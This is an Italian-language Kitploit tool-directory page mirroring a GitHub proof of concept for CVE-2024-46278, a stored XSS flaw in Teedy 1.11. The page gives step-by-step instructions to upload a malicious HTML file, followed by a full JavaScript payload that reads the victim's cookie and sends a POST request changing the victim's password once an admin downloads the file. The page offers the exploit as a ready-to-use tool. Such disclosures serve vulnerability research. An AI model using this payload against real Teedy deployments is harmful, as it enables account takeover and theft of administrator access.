Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-46278-teedy_1.11_account-takeover — 【Teedy 1.11】Acquisizione dell'account tramite XSS | Kitploit
Strumenti/GitHubGitHub/ayato-shitomi/cve-2024-46278-teedy_1.11_account-takeover
Strumenti di PhishingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingIngegneria Sociale
GitHubayato-shitomi/cve-2024-46278-teedy_1.11_account-takeover

CVE-2024-46278-teedy_1.11_account-takeover

【Teedy 1.11】Acquisizione dell'account tramite XSS

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

【CVE-2024-46278】teedy_1.11_account-takeover

【Teedy 1.11】compromissione dell'account tramite XSS

Dettagli

Esiste una vulnerabilità che causa XSS durante il download dei file. La vulnerabilità XSS potrebbe consentire a un amministratore di Teedy di rubare un account con pochi clic.

Questa vulnerabilità è contrassegnata come CVE-2024-46278: https://www.cve.org/CVERecord?id=CVE-2024-46278

PoC

  • Accedi con l'account di un attaccante.
  • Carica questo file come tipo html. Devi modificare “Origin” e “Referer” e, se necessario, l'argomento della fetch.
root@kitploit:~
<script>
const currentCookie = document.cookie;

const requestOptions = {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    'Accept': 'application/json, text/plain, */*',
    'Cookie': currentCookie,
    'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
    'sec-ch-ua-mobile': '?0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
    'sec-ch-ua-platform': '"Linux"',
    'Origin': 'http://localhost:8080',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Dest': 'empty',
    'Referer': 'http://localhost:8080/',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9'
  },
  body: 'password=superSecure2&passwordconfirm=superSecure2'
};

fetch('http://localhost:8080/api/user', requestOptions)
  .then(response => {
    if (!response.ok) {
      throw new Error('Network response was not ok');
    }
        document.write('<h1>Your account was taken over by the attacker LOL</h1>');
    return response.json();
  })
  .then(data => console.log(data))
  .catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
  • Accedi con un altro account, ad es. admin
  • Fai clic sul file caricato dall'attaccante e seleziona Download this file.

Demo

https://www.youtube.com/watch?v=udQgVogsmhA

Scarica lo strumento